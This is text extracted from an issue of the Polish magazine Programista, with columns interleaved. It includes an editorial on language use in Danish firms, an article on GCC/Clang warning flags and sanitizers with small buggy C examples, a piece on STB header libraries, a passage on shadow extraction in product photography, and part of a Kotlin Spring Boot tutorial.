Programista 98c
Programista 98c
Programista 98c
/* Skandynawska ścieżka */
Kiedy piszę te słowa, sezon wakacyjny trwa w najlepsze, klienci uda- inaczej niż u nas. Kariera zawodowa duńskiego inżyniera to przede
li się na urlopy, a możliwość wprowadzania zmian w infrastrukturze wszystkim praca w firmach krajowych (ale oczywiście niekoniecznie
i systemach w większości uległa zamrożeniu. Mnie ten okres zawsze o zasięgu jedynie lokalnym). Język duński jako „obowiązujący” w pracy
skłania do podsumowań i przemyśleń, nawet bardziej niż końcówka to nie jakiś dziwny przypadek, a wręcz przeciwnie – standard. Analo-
roku. Dziś chciałbym opowiedzieć, czego zazdroszczę Duńczykom (od gicznie, jak podpowiadają znajomi, wygląda to w innych krajach skan-
razu zaznaczę, że nie będzie o „państwie socjalnym” ani PKB -- a przy- dynawskich, a także np. w Niemczech czy Francji.
najmniej nie wprost). Z kolei w Polsce, jak wskazują dostępne dane, choćby doroczny ra-
Ale skąd w ogóle ten pomysł? Otóż jest sobie pewna firma, będą- port ABSL (Związek Liderów Sektora Usług Biznesowych), większość
ca dostawcą usług i infrastruktury dla duńskiego sektora finansowe- z nas pracuje w firmach międzynarodowych lub świadczących usługi
go. Firma istnieje już prawie dwie dekady i do niedawna zatrudniała dla takich firm [2]. W konsekwencji traktujemy posługiwanie się angiel-
wyłącznie lokalnie, w Danii. Kilka lat temu zdecydowała się jednak za- skim w pracy jako coś zupełnie naturalnego, nawet pracując w firmie
trudniać kontraktorów z naszego kraju, a ponieważ od ponad półtora 100% polskiej.
roku jestem jednym z nich, mam możliwość obserwacji od środka, jak Kiedy zastanawiałem się nad tym, czy ta różnica ma jakieś konse-
przebiega tak duża zmiana organizacyjna. kwencje, przypomniałem sobie o Europejskim Raporcie Innowacyj-
Poprzednio cała komunikacja firmowa odbywała się w języku duń- ności (EIS 2021) [3]. Całe podium przypada w nim krajom nordyckim
skim, co po prostu w nowej sytuacji musiało ulec zmianie. Ponieważ (Skandynawia + Finlandia), a następne są Benelux i Niemcy. Jedynym
znajomość tego języka w Polsce nie jest powszechna, podobnie jak państwem z naszej części Europy powyżej średniej unijnej jest Estonia.
niski jest odsetek Duńczyków władających polszczyzną – językiem A Polska, niestety, na miejscu czwartym… od końca. Czy to przypadko-
obowiązującym stał się oczywiście angielski. wa koincydencja? Intuicja podpowiada mi, że niekoniecznie. Co jest
Spójrzmy na ranking EF EPI (English Proficiency Index) – Dania przyczyną, a co skutkiem? Pracujemy dla zagranicznych firm z braku
na drugim miejscu [1]. Myślę, że zaskoczenia nie ma. Jak wypada alternatywy? Czy może odwrotnie – firmy zachodnie, dysponując więk-
Polska? Nieco gorzej, ale nadal dobrze – trafiliśmy do drugiej grupy szymi budżetami, „podkradają” specjalistów, utrudniając powstawanie
(proficiency: High). Świetnie, skoro wszyscy znają dobrze angielski, i rozwój innowacyjnych polskich firm? A może obie odpowiedzi są po-
można by się było spodziewać, że temat zamknięty. Tymczasem, po prawne? Z tymi pytaniami was zostawiam, oczywiście zastrzegając,
dobrych kilkudziesięciu miesiącach, nadal zdarza się, że nowe doku- że powodów niskiej pozycji Polski w rankingu innowacyjności z pewno-
menty, prezentacje, formularze tworzone są w języku duńskim. Cza- ścią jest wiele (w tym ekonomicznych, politycznych czy społecznych).
sem także maile mające na liście adresatów osoby z Polski, mimo Niemniej, o ile rzeczywistość jest złożona i prostych recept nie ma,
tego, że wszyscy, z którymi się choć raz kontaktowałem, posługują się efekty są łatwo widoczne. Przykładem jest np. to, że Polacy regular-
angielskim zupełnie swobodnie. Dałoby się to łatwo wytłumaczyć przy- nie wypadają świetnie na Międzynarodowej Olimpiadzie Informatycz-
zwyczajeniem, gdyby nie fakt, że zdarza się to nie tylko pracownikom nej, a nie powstała na razie nad Wisłą druga Dolina Krzemowa. Albo
z dwudziestoletnim stażem (i adekwatną liczbą przeżytych wiosen), właśnie to, że przeważająca część z nas, pracując dla firm zagranicz-
ale także młodym, świeżo po uniwersytecie. Duńczycy to przemili lu- nych, de facto buduje ich innowacyjność. Silna gospodarka, tworząca
dzie, w pracy zachowujący się bardzo profesjonalnie, dlatego celowe innowacyjne i atrakcyjne miejsca pracy – tego można pozazdrościć
działanie „na złość” wydawało mi się mało prawdopodobne – taka hi- Duńczykom. Komunikacja w języku ojczystym jest jedynie tego faktu
poteza mogłaby wyjaśniać co najwyżej pojedyncze incydenty. konsekwencją.
Postanowiłem więc z koleżankami i kolegami Duńczykami o tym
Jarosław Górny
porozmawiać – sprawdzić, jak oni to widzą i tłumaczą. Z mojego, mało
profesjonalnego, riserczu dowiedziałem się, że nie przyszła mi do gło- [1] https://www.ef.pl/epi/regions/europe/
[2] https://absl.pl/storage/app/uploads/public/5ee/887/8d5/5ee8878d59858995982318.pdf
wy jeszcze jedna rzecz – rynek pracy (nie tylko IT) wygląda w Danii [3] https://ec.europa.eu/docsroom/documents/46411/attachments/1/translations/pl/renditions/native
/* REKLAMA */
SPIS TREŚCI
BIBLIOTEKI I NARZĘDZIA
6 # Zaprzyjaźnij się z kompilatorem. Krótki przewodnik po flagach
01010000
01110010
> Dominik Adamski
Z ARCHIWUM CVE
01101001
64 # Błąd uwierzytelnienia w OpenBSD
> Mariusz Zaborski
PLANETA IT
01110011
66 # Programowanie napotyka cyberbezpieczeństwo
> Michał Zbyl
01110100
01100001
ZAMÓW PRENUMERATĘ MAGAZYNU PROGRAMISTA
Magazyn Programista wydawany jest przez Dom Wydawniczy Anna Adamczyk Nota prawna
Wydawca/Redaktor naczelny: Anna Adamczyk ([email protected]). Redaktor prowadzący: Redakcja zastrzega sobie prawo do skrótów i opracowań tekstów oraz do zmiany planów
Mariusz „maryush” Witkowski ([email protected]). Korekta: Tomasz Łopuszański. Kierownik wydawniczych, tj. zmian w zapowiadanych tematach artykułów i terminach publikacji, a także
produkcji/DTP: Krzysztof Kopciowski. Dział reklamy: [email protected], tel. +48 663 220 102, nakładzie i objętości czasopisma.
tel. +48 604 312 716. Prenumerata: [email protected]. Współpraca: Michał Bartyzel, Mariusz O ile nie zaznaczono inaczej, wszelkie prawa do materiałów i znaków towarowych/firmowych
Sieraczkiewicz, Dawid Kaliszewski, Marek Sawerwain, Łukasz Mazur, Łukasz Łopuszański, Jacek Matulewski, zamieszczanych na łamach magazynu Programista są zastrzeżone. Kopiowanie i rozpowszechnianie
Sławomir Sobótka, Dawid Borycki, Gynvael Coldwind, Bartosz Chrabski, Rafał Kocisz, Michał Sajdak, Michał ich bez zezwolenia jest Zabronione.
Bentkowski, Paweł „KrzaQ” Zakrzewski, Radek Smilgin, Jarosław Jedynak, Damian Bogel (https://kele.codes/), Redakcja magazynu Programista nie ponosi odpowiedzialności za szkody bezpośrednie
Michał Zbyl, Dominik 'Disconnect3d' Czarnota. Adres wydawcy: Dereniowa 4/47, 02-776 Warszawa. i pośrednie, jak również za inne straty i wydatki poniesione w związku z wykorzystaniem informacji
Druk: http://www.edit.net.pl/, Nakład: 4500 egz. prezentowanych na łamach magazynu Programista.
BIBLIOTEKI I NARZĘDZIA
szerszy wachlarz sprawdzania poprawności kodu wejściowego. Może Listing 4. Przykład kodu wykorzystującego rozszerzenia GCC i Clanga nie-
się zdarzyć, że potencjalny błąd nie zostanie wykryty przy użyciu zgodnych ze standardem C
jednego narzędzia do budowania, ale zostanie on rozpoznany przez int isInRange(int option) {
inne. Ten problem zilustrowano w Listingu 2, w którym kod jest taki switch (option) {
//rozszerzenie GCC i Clanga
sam, jak w przypadku Listingu 1, a jedyna różnica polega na braku case 1 ... 3:
return 1;
formatowania. W przypadku niesformatowanego kodu i dodanych
}
flag -Wall i -Wextra kompilator GCC 11.1 ostrzega, że po słowie return 0;
}
kluczowym else jest średnik i w efekcie zbiór instrukcji wykonywa-
nych, gdy argument num jest podzielny przez 2, jest zbiorem pustym.
Clang 12 nie zgłasza żadnych zastrzeżeń do kodu wejściowego, cho- Powodem, który sprawia, że kompilator MSVC zgłasza błąd, jest uży-
ciaż wygenerowany kod nie spełnia założeń programisty, który chciał cie wyrażenia case 1 ... 3, które nie jest przewidziane w standar-
napisać funkcję testującą parzystość liczb. Clang wygeneruje ostrze- dzie języka C. Jest to rozszerzenie, które jest wspierane przez GCC
żenie przy dodanych flagach -Wall i -Wextra, jeśli kod wejściowy i Clang. Flaga -Wpedantic dołączona do wywołania GCC lub Clanga
zostanie sformatowany tak jak w Listingu 1. rozszerza sprawdzanie kodu pod kątem zgodności z wersją standar-
du, który jest określany przez flagę -std=wersja_języka [1]. Uży-
Listing 2. Przykład kodu, dla którego ostrzeżenia są różne pomimo zastoso-
wania tych samych flag dla GCC i Clanga cie rozszerzenia języka, które nie jest zdefiniowane w standardzie,
jest odnotowane, dzięki czemu programista ma szansę przepisać kod
int isEven(unsigned int number) {
w oparciu o powszechnie dozwolone wyrażenia.
int res = 0;
if (number % 2)
res = 0;
//nadmiarowy średnik DODATKOWE FLAGI – LEPSZY KOD
else;
res = 1; Przedstawione do tej pory opcje poszerzające diagnostykę podczas
return res; budowania projektu dotyczyły dwóch aspektów: zwiększenia zgod-
}
ności kodu ze standardem języka oraz poprawności kodu pod kątem
wysokopoziomowych założeń (np. mylące formatowanie, które spra-
Niektóre flagi dotyczące ostrzeżeń są aktywowane w GCC, jeśli zo- wia, że łatwo jest przeoczyć błąd logiczny jak w Listingu 1). Innym
stanie włączona optymalizacja [1]. Jedną z takich opcji jest -Wnull- celem, jaki może być osiągnięty za pomocą dodatkowych flag, jest
dereference, która informuje programistę o wykryciu sytuacji, gdy wskazywanie już na etapie kompilacji fragmentów kodu, które mogą
ten próbuje uzyskać wartość, na jaką wskazuje wskaźnik NULL [1]. przyczynić się do spadku wydajności docelowej aplikacji. W Listin-
W Listingu 3 przedstawiono funkcję, która próbuje zwrócić wartość, gu 5 przedstawiono funkcję, która mnoży swój argument przez 0.5.
jaka jest zapisana pod adresem NULL. Domyślnie operacje, w których występuje literał zmiennoprzecinko-
wy, są realizowane przy pomocy arytmetyki zmiennoprzecinkowej
Listing 3. Przykład błędu, który nie zawsze zostanie wykryty przez GCC
o podwójnej precyzji [3]. Takie obliczenia mogą zająć dużo czasu,
int foo() { jeśli są wykonywane na platformie, która nie ma sprzętowego wspar-
int *ptr = NULL;
//niedozwolona operacja cia dla takich operacji (np. procesory ARM Cortex-M4 [4]). Flaga
int res = *ptr; GCC -Wdouble-promotion [1] pozwoli na wykrycie przypadków
return res;
}
niepotrzebnej konwersji już na etapie kompilacji kodu. Dzięki temu
programista ma szansę napisać wydajniejszy kod bez potrzeby profi-
lowania docelowej aplikacji.
GCC 11.1 poinformuje o niedozwolonej operacji w funkcji foo, tylko
Listing 5. Przykład kodu, który będzie nieefektywny na procesorze ARM
jeśli zostanie uruchomiona optymalizacja co najmniej na poziomie Cortex-M4
-O1 i dodana flaga -Wnull-dereference.
float doublePromotion(float factor) {
Listingi 2 i 3 pokazują, że stopień wykrywania potencjalnych błę- return factor * 0.5;
dów zależy od danego kompilatora i jego konfiguracji. Z tego powo- }
logiki programu. W Listingu 6 przedstawiono funkcję, której wynik sza zastrzeżenia dotyczące takich wyrażeń przy załączonych flagach
trudno przewidzieć, jeśli przekazany argument funkcji będzie liczbą -std=c++17 -Wall[1]. Niektóre algorytmy sprawdzania popraw-
nieujemną. ności kodu mogą zgłaszać fałszywie pozytywne ostrzeżenia, jak np.
-Warray-bounds=2 w GCC, który sprawdza, czy nie nastąpiła próba
Listing 6. Funkcja, której zwracana wartość może zależeć od niezainicjalizo-
wanej zmiennej odczytu lub zapisu poza ostatni element tablicy [1]. Inny przykład
flagi, która nie jest rekomendowana, to -Weverything w Clangu,
int foo(int num) {
int res; która uruchamia wszystkie, nawet eksperymentalne metody spraw-
if (num < 0) dzania kodu [2].
res = -1;
// wynik nieokreślony,
// gdy num >= 0
return 4/res; BRAK OSTRZEŻEŃ = POPRAWNY KOD?
}
Nie ma gwarancji, że nawet najbardziej restrykcyjne ostrzeżenia po-
Clang z dodaną opcją -Wall zgłosi ostrzeżenie, że zmienna res może zwolą na wczesne wykrycie wszystkich potencjalnych błędów. Funk-
być niezainicjalizowana, jeśli wartość parametru num będzie większa cja div z Listingu 9 jest poprawna, dopóki nie nastąpi próba urucho-
od zera. Wyeliminowanie ostrzeżenia jest proste: wystarczy podać mienia jej z argumentem b = 0. Na etapie kompilacji funkcji div
wartość początkową zmiennej res. Zainicjalizowanie zmiennej war- nie można określić, czy funkcja będzie zawsze wywoływana w sposób
tością 0, tak jak w Listingu 7, sprawi, że kompilator nie zgłosi zastrze- bezpieczny. Jedynie przeanalizowanie wszystkich wywołań funkcji
żeń, jednak kod będzie zawierał niezdefiniowaną operację (dzielenie div w czasie pracy programu wykorzystującego badany kod pozwoli
przez zero), jeśli argument funkcji foo będzie nieujemny. na odpowiedź, czy jest on używany w sposób bezpieczny.
Listing 7. Przykład źle rozwiązanego ostrzeżenia z listingu 6 Listing 9. Przykład potencjalnie niebezpiecznej funkcji
IM WIĘCEJ, TYM LEPIEJ? nia programu w trakcie jego działania, dzięki czemu wygenerowane
ostrzeżenia są dokładniejsze, ponieważ wykrywają groźne sytuacje,
Do tej pory analizowane były przypadki, kiedy rozbudowana diagno- które mogą zostać niezauważone podczas kompilacji. Eliminowane
styka umożliwiała zauważyć ukryty błąd i już na etapie kompilacji jest także ryzyko wystąpienia fałszywie pozytywnych ostrzeżeń, jak
programista mógł rozwiązać wykryte problemy. Nie zawsze jednak to może mieć miejsce w przypadku bardziej zaawansowanych flag,
wygenerowane ostrzeżenia odzwierciedlają rzeczywiste pułapki, ja- takich jak wspomniana wcześniej opcja -Warray-bounds=2. Wadą
kie kryją się w kodzie. Standard C++17 określa kolejność wykony- sanitizerów jest konieczność dłuższego testowania programu. Odpo-
wania operacji typu a = a++; [5]. Pomimo że tego typu operacja wiedź na pytanie, czy sprawdzany program jest w pełni prawidłowy,
jest całkowicie legalna od wersji C++17, kompilator GCC nadal zgła- uzyskujemy dopiero po zbudowaniu projektu i uruchomieniu go
{ WWW.PROGRAMISTAMAG.PL } <9>
BIBLIOTEKI I NARZĘDZIA
z typowymi argumentami, co jednak znacznie wydłuża czas testowa- W przypadku sprawdzania kodu pod kątem operacji niezdefinio-
nia. Należy także wyodrębnić zbiór wartości wejściowych, z jakimi wanych istnieje możliwość pominięcia linkowania dodatkowej biblio-
warto sprawdzać zbudowaną aplikację, co także może nie być zada- teki. W tym celu należy dodać opcję -fsanitize-undefined-trap-
niem prostym. on-error podczas kompilacji kodu źródłowego do pliku binarnego [7].
Sanitizery opierają się o instrumentację kodu wejściowego. Do Pominięcie dodatkowej biblioteki powoduje zakończenie działania
kodu wejściowego dołączane są wywołania funkcji sprawdzających programu przy pierwszej wykrytej nieprawidłowej operacji. W celu
poprawność wykonywanego kodu. Zakres instrumentacji zależy od zdiagnozowania przyczyny należy użyć debuggera, ponieważ nie są
wybranego rodzaju diagnostyki [7]. Istnieje możliwość weryfikowa- dostępne przejrzyste komunikaty podobne do tych z Listingu 12.
nia poprawności nie tylko pod kątem pojedynczych typów operacji Dodanie sanitizerów do testowanej aplikacji wiąże się ze spad-
niezdefiniowanych (jak np. dzielenie przez zero), ale także bardziej kiem wydajności. Narzut związany z dodatkowym sprawdzeniem
złożonych zagadnień, jak np. zależności między wątkami lub wła- zależy od rodzaju przeprowadzanych testów. W przypadku opcji
ściwego zarządzania pamięcią. Wszystkie dostępne opcje są wymie- -fsanitize=address, która odpowiada za testowanie pod kątem
nione w dokumentacji kompilatora [7] [10]. Niezależnie od wybra- właściwego zarządzania pamięcią (np.wykrywa podwójne zwalnianie
nego typu sposób korzystania z sanitizerów jest podobny – należy zaalokowanej pamięci), należy liczyć się z około dwukrotnie dłuż-
dodać odpowiednie flagi -fsanitize=typ_sanitizera na etapie szym czasem wykonywania i dwukrotnie większą ilością potrzebnej
kompilacji i linkowania, a następnie uruchomić testowaną aplikację. pamięci [8], podczas gdy testowanie pod kątem niezdefiniowanych
W Listingu 10 przedstawiono przykładowy kod zawierający niezde- opercji tak jak w Listingu 11 nie wiąże się z większą ilością wyko-
finiowaną operację (przepełnienie liczby całkowitej ze znakiem). rzystywanej pamięci i przyczynia się do nieznacznie dłuższego czasu
Sposób uruchomienia zaprezentowano w Listingu 11. Oprócz flag działania programu [9].
uruchamiających sanitizer -fsanitize=undefined dodane są także
flagi -g oraz -fno-omit-frame-pointer, które zapewniają czytel-
PODSUMOWANIE
niejsze komunikaty w przypadku wykrytego błędu [8]. Przekazanie
opcji -fsanitize=undefined do linkera zapewnia, że wszystkie wy- Zaprezentowane w artykule opcje stanowią jedynie fragment dostęp-
magane zależności sanitizera zostaną uwzględnione. Dodana opcja nych narzędzi, które umożliwiają szybkie wykrycie potencjalnych
-O1 gwarantuje szybsze wykonywanie badanego kodu dzięki urucho- błędów. Przedstawienie wszystkich możliwości weryfikacji pod kątem
mionym optymalizacjom, które nie ingerują mocno w strukturę pro- niezgodności ze standardem znacznie wykracza poza ramy tego ar-
gramu. Ustawienie zmiennej środowiskowej UBSAN_OPTIONS=print_ tykułu. Niezależnie od wybranych narzędzi dodatkowe sprawdzanie
stacktrace=1 pozwoli na otrzymanie dokładniejszych logów kodu przyczynia się do zapewnienia wysokiej jakości końcowej apli-
pokazujących kolejność wywoływanych funkcji dla wykrytej operacji kacji. Wyeliminowanie nieprawidłowych operacji znacznie rozszerza
niezdefiniowanej [8]. Przykładowe logi zawierające dokładne infor- możliwości automatycznej optymalizacji kodu. Zamiast ręcznej mo-
macje dotyczące nieprawidłowej operacji zawarto w Listingu 12. dyfikacji, developerzy mogą spróbować dodać do procesu budowania
zaawansowane metody usprawniania kodu, takie jak optymalizacja
Listing 10. Przykład programu zawierającego niezdefiniowaną operację
czasu linkowania (ang. Link Time Optimization – LTO), lub skorzy-
---test.c--- stać z bardziej wydajnego kompilatora. Zaoszczędzony w ten sposób
#include <limits.h>
czas można przeznaczyć na rozwój nowych funkcjonalności.
int overflow(int a) {
return a + INT_MAX;
}
Bibliografia
int main() {
//przepełnienie [1] https://gcc.gnu.org/onlinedocs/gcc-11.1.0/gcc/Warning-Options.html#Warning-Options
return overflow(1); [2] https://clang.llvm.org/docs/UsersManual.html#options-to-control-error-and-warning-messages
} [3] http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1570.pdf – sekcja 6.3.1
[4] https://dzone.com/articles/be-aware-floating-point-operations-on-arm-cortex-m
Listing 11. Sposób uruchomienia sanitizera [5] https://en.cppreference.com/w/cpp/language/eval_order
[6[ https://github.com/google/sanitizers/wiki
[7] https://tinyurl.com/2w8wjsdx
# kompilacja
[8] https://github.com/google/sanitizers/wiki/AddressSanitizer
> gcc -fsanitize=undefined -O1 \
[9] https://m-peko.github.io/craft-cpp/posts/be-wise-sanitize-keeping-your-cpp-code-free-from-bugs/
-g -fno-omit-frame-pointer \
[10] https://clang.llvm.org/docs/
-c test.c
# linkowanie
> gcc -fsanitize=undefined test.o -o test
# testowanie
> UBSAN_OPTIONS=print_stacktrace=1 ./test
D OMINIK ADAMSKI
Listing 12. Logi otrzymane po uruchomieniu programu test z sanitizerem
[email protected]
test.c:4:13: runtime error: \
Programista w Mobica Limited. Zwolennik maksy-
signed integer overflow: 1 + 2147483647 \
cannot be represented in type 'int' malnego wykorzystania dostępnych narzędzi pro-
gramistycznych w celu uzyskania jak najbardziej
#0 0x5602d8dc819c in overflow test.c:4 wydajnego kodu. Aktywnie działa w łódzkiej gru-
#1 0x5602d8dc819c in main test.c:9
pie CEHUG, która ma na celu dzielenie się wiedzą
z zakresu szeroko pojętych systemów wbudowa-
nych. Prywatnie pasjonat górskich wędrówek.
PAN RACZY ŻARTOWAĆ, PANIE kowych), jak i implementację (czyli kod, który domyślnie umieszcza
się w plikach cpp). Implementacja ta jednak nie jest domyślnie kom-
BARRETT? pilowana po dołączeniu pliku nagłówkowego danej biblioteki. Korzy-
Jest takie mądre powiedzenie autorstwa Alana Perlisa: stając z wybranego komponentu STB, musisz wybrać jeden (i tylko
Głupcy ignorują złożoność. Pragmatycy żyją z nią. Niektórzy umie- jeden) plik źródłowy w twoim projekcie, w którym dołączona będzie
ją jej uniknąć. Geniusze ją usuwają. jego implementacja. W tym pliku należy zdefiniować odpowiednie
Twórcę bibliotek STB, Seana T. Barretta, śmiało można nazwać makro (wskazane w dokumentacji biblioteki), którego obecność
geniuszem pragmatyzmu. To właśnie w umyśle tego człowieka (no- sprawi, że zadzieje się to automatycznie. Na przykład, aby skorzystać
tabene weterana gamedevu, współtwórcy wielu znamy gier, między z biblioteki stb_image.h, musisz zapewnić, że jeden (tylko jeden!)
innymi „Thief ” oraz „System Shock 2”) zrodził się pomysł na to, jak z plików źródłowych w twoim projekcie dołączy nagłówek tej biblio-
zredukować złożoność procesu zarządzanie zależnościami (przez za- teki w następujący sposób:
leżności rozumiem tutaj zewnętrzne biblioteki) w dużych projektach
#define STB_IMAGE_IMPLEMENTATION
budowanych w języku C++. Wyobraź sobie, że tworzysz projekt, któ- #include "stb_image.h"
ry korzysta z szeregu innych bibliotek (co w praktyce jest na porząd-
ku dziennym). W takim przypadku musisz zmierzyć się z szeregiem I to w zasadzie tyle, jeśli chodzi o podstawową instrukcję obsługi.
problemów, aby zapewnić, że biblioteki te będą w poprawny sposób Oczywiście biblioteki STB oferują sporo opcji konfiguracji (np. za po-
zintegrowane z twoim projektem. C++ nie oferuje standardowego mocą makrodefinicji). W kolejnym akapicie omówię bardziej szcze-
narzędzia, które pomoże ci w zarządzaniu tymi zależnościami. Oczy- gółowo konkretny przykład użycia wybranych bibliotek STB.
{
Image::Image(int width, int height)
: pixelData_(nullptr)
W ramach poglądowego przykładu użycia wybranych bibliotek STB , width_(0)
chciałbym zaprezentować fragment implementacji klasy Image z bi- , height_(0)
{
blioteki zawierającej zbiór komponentów uzupełniających w stosunku Create(width, height);
do biblioteki standardowej, wykorzystywanych w moich prywatnych }
{ WWW.PROGRAMISTAMAG.PL } <15>
BIBLIOTEKI I NARZĘDZIA
ImagePtr image{make_unique<Image>(
Listing 4. Wizualizacja fragmentu zbioru Mandelbrota w języku C++
width, height)};
#include <complex> for(int py=0; py<height; ++py)
#include <memory> {
auto y=double(py)/
#include "ez_image.h"
height*(ymax-ymin)+ymin;
using namespace ez;
for(int px=0; px<width; ++px)
using namespace std;
{
Color mandelbrot(const complex<double>& z) auto x=double(px)/
width*(xmax-xmin)+xmin;
{ complex<double> z(x, y);
constexpr auto iterations = 200U; image->SetPixel(px, py, mandelbrot(z));
constexpr auto contrast = 15; }
}
complex<double> v(0, 0);
image->Save("mandelbrot.png");
for(auto n=0U; n<iterations; ++n) }
{
v = v*v + z;
if(abs(v) > 2) Efekt działania tego programu pokazany jest na Rysunku 1.
{
const uint8_t c = 255U - contrast*n;
return Color(c, c, c);
}
RAFAŁ KO CISZ
[email protected]
Od prawie dwudziestu lat pracuje w branży związanej z produkcją oprogramowania. Aktualnie zatrudniony w roli Kierownika
Portfela Projektów w firmie intive.
{ WWW.PROGRAMISTAMAG.PL } <17>
Algorytm ekstrakcji naturalnego cienia – nowe
osiągnięcia automatyzacji fotografii produktowej
Procesy analizy i przetwarzania obrazów towarzyszą nam dziś na każdym kroku, chociaż czę-
sto nie zdajemy sobie z tego sprawy. Jazda samochodem, badanie diagnostyczne u lekarza
czy uruchomienie komórki zerknięciem w ekran to setki obliczeń na milisekundę. Obecnie to
samo dotyczy fotografii.
kolorów2. Ograniczeniem jest rodzaj powierzchni, na którą rzucany statystyczne i kolorystyczne w celu prawidłowego segmentowania
jest cień – musi być ona pozbawiona tekstur, natomiast światło musi obszaru cienia. Przykładowe deskryptory obrazu: jasność obrazu,
być pojedyncze i mocne. W metodzie B detekcja cienia odbywa się na histogram koloru, histogram zorientowanych gradientów (HOG), hi-
podstawie ekstrakcji cech – deskryptorów obrazu i uczenia maszyno- stogram lokalnych wzorców binarnych (LBP), histogram lokalnych
wego3 z wykorzystaniem maszyny wektorów nośnych (SVM) wyma- wzorców trójskładnikowych (LTP). Metoda wymaga sprecyzowanej
gających ekstrakcji cech. Funkcje obejmują funkcje geometryczne, i dużej bazy treningowej, co czyni ją bardzo czasochłonną. Światło
może być niejednorodne.
2. Elena Salvador, Andrea Cavallaro, and Touradj Ebrahimi. „Shadow identication and classication Metodą C nazwaliśmy autorski algorytm ekstrakcji cienia, któ-
using invariant color models”. In IEEE International Conference on ,Acoustics, Speech, and Signal
Processing. (ICASSP’01)., pages 1545-1548, 2001. https://infoscience.epfl.ch/record/86804/files/Salva- ry w pełni wykorzystuje zalety konstrukcyjne urządzenia Jumbo
dor2001_113.pdf
3. Arjan Gijsenij and Theo Gevers. „Shadow edge detection using geometric and photometric featu-
MODE360°. Został on opracowany na bazie zdobytego doświadczenia
res”. In 16th IEEE International Conference on Image Processing (ICIP), 2009, pages 693-696. IEEE, 2009. w czasie realizacji projektu. Nowa koncepcja dedykowana jest dla śro-
https://ivi.fnwi.uva.nl/isis/publications/2009/GijsenijICIP2009/GijsenijICIP2009.pdf, Jiejie Zhu, Kegan GG
Samuel, Syed Zain Masood, and Marshall F Tappen. „Learning to recognize shadows in monochro- dowiska wewnętrznego i charakteryzuje się ograniczeniem działania
matic natural images”. In IEEE Conference on Computer Vision and Pattern Recognition (CVPR), 2010,
pages 223{230. IEEE, 2010. http://www.cs.ucf.edu/~mtappen/pubs/cvpr10_shadow.pdf do maszyn o analogicznej konstrukcji z autorskim źródłem światła.
Opis wybranych opcji: Ta wersja umożliwia nam wystartowanie naszej aplikacji z pomo-
» Gradle – projekt będzie bazował na tym narzędziu (https://docs. cą komendy java -jar article.jar. Nie ma potrzeby dodat-
gradle.org/current/userguide/userguide.html). Umożliwia ono za- kowego „instalowania” osobnego kontenera aplikacji.
rządzanie zależnościami (czyli bibliotekami) oraz poprawne wy- » JOOQ Access Layer – tej bibliotek będziemy używać do zapisy-
kreowanie (kompilacja kodu, testy, dodanie wszystkich niezbęd- wania i odczytywania danych z bazy. Innym popularnym roz-
nych plików itd.) pliku z rozszerzeniem jar, w którym będzie wiązaniem byłoby użycie implementacji JPA, np. Hibernate czy
spakowana cała nasza usługa. Co więcej, już na tym poziomie Eclipse Link. Zdecydowałem się jednak nie dokładać tej dodat-
będziemy używać Kotlina. kowej warstwy z racji na te osoby, które dopiero zaczynają two-
» Kotlin – nowoczesny język zyskujący coraz większą popularność ze rzenie usług. Pozostaniemy zatem na poziomie SQLa.
względu na swoje możliwości (https://kotlinlang.org/#why-kotlin). » Flyway Migration – za pomocą tego narzędzia struktura na-
Podobnie jak Java jest kompilowany do kodu bajtowego (pliki szej bazy będzie aktualizowana przy wgrywaniu nowych wersji
z rozszerzeniem class), który jest następnie wykonywany przez aplikacji. W projekcie będziemy przechowywać pliki sql, które
Wirtualną maszynę Javy (JVM). Ponadto Kotlin umożliwia nam Flyway będzie wgrywał do bazy danych podczas startu aplika-
korzystanie z bibliotek javowych. cji, nie musimy więc robić tego sami. Mamy też gwarancję, że
» Spring Boot – jeden z wielu springowych modułów (https://spring. dany skrypt zostanie wykonany tylko raz pomimo wielokrotne-
io/projects). Umożliwia korzystanie z bibliotek typu starter, któ- go wgrywania nowych wersji czy restartowania aplikacji. Można
re zdejmują z nas ciężar konfigurowania wszystkiego samemu, tutaj też skorzystać z narzędzia Liquibase.
np. za pomocą jednej adnotacji lub parametru konfiguracyjnego » H2 – baza, której użyjemy. Można ją uruchomić wraz z aplika-
możemy włączyć daną funkcjonalność typu: cache, transakcyj- cją. Dodatkowo możemy włączyć możliwość użycia konsoli h2
ność, repozytoria JPA itd. Wymogiem jest zaimportowanie od- – klienta bazy danych w przeglądarce.
powiednich bibliotek.
» Java 11 – poziom kodu bajtowego, do którego ma być skompilo- Po wygenerowaniu projektu musimy go zaimportować w Intellij
wana nasza aplikacja. Będziemy też uruchamiać naszą aplikację IDEA (Open lub File | Open). W przypadku pojawienia się pytania,
na Wirtualną maszynę Javy (JVM). jak zaimportować projekt, należy wybrać Gradle.
{ WWW.PROGRAMISTAMAG.PL } <25>
PROGRAMOWANIE ROZWIĄZAŃ SERWEROWYCH
Dodajmy teraz kontroler, który będzie naszym punktem styko- We wspomnianej sekcji dependencies deklarujemy zależności,
wym ze światem zewnętrznym. Utwórzmy zwykłą klasę kotlinową jakich chcemy używać, a także określić zakres ich użycia. Zależno-
z nazwą UserResource i skopiujmy poniższy kod: ści z zakresem testImplementation „są dostępne” tylko w ramach
testów. Tych bibliotek nie znajdziemy w naszej wygenerowanej apli-
Listing 3. Klasa UserResource
kacji. Zwróćmy uwagę, że niektóre biblioteki nie mają wersji. Jest to
package pl.programista.article.resource związane z użyciem wtyczki io.spring.dependency-management.
import org.springframework.http.HttpStatus (https://docs.spring.io/dependency-management-plugin/docs/current/
import org.springframework.http.ResponseEntity
import org.springframework.web.bind.annotation reference/html/), która „podpowiada” Gradle domyślne wersje dla
.GetMapping części bibliotek.
import org.springframework.web.bind.annotation
.RequestMapping Następnym krokiem jest dodanie klasy testowej article\src\test\
import org.springframework.web.bind.annotation kotlin\pl\programista\article\UserResourceTest.kt i wklejenie poniż-
.RestController
import pl.programista.article.Address szego kodu:
import pl.programista.article.User
Listing 5. Klasa UserResourceTest
@RequestMapping(path = ["/users"])
@RestController
package pl.programista.article.resource
class UserResource {
» @TestInstance – standardowo nie wiemy, w jakiej kolejności java zamiast kotlin. Do tego katalogu będziemy kopiować wygene-
wykonają się metody testowe. Nie mamy na to żadnej gwaran- rowane pliki przez wtyczkę Jooq.
cji. Jest to pożądane, ponieważ wymusza na nas pisanie nie- Skonfigurujmy teraz generator Jooqa. Z pliku build.gradle.kts na-
zależnych od siebie testów. Jednak w przypadkach takich jak leży skopiować linie od sekcji jooq (linia nr 66) w dół.
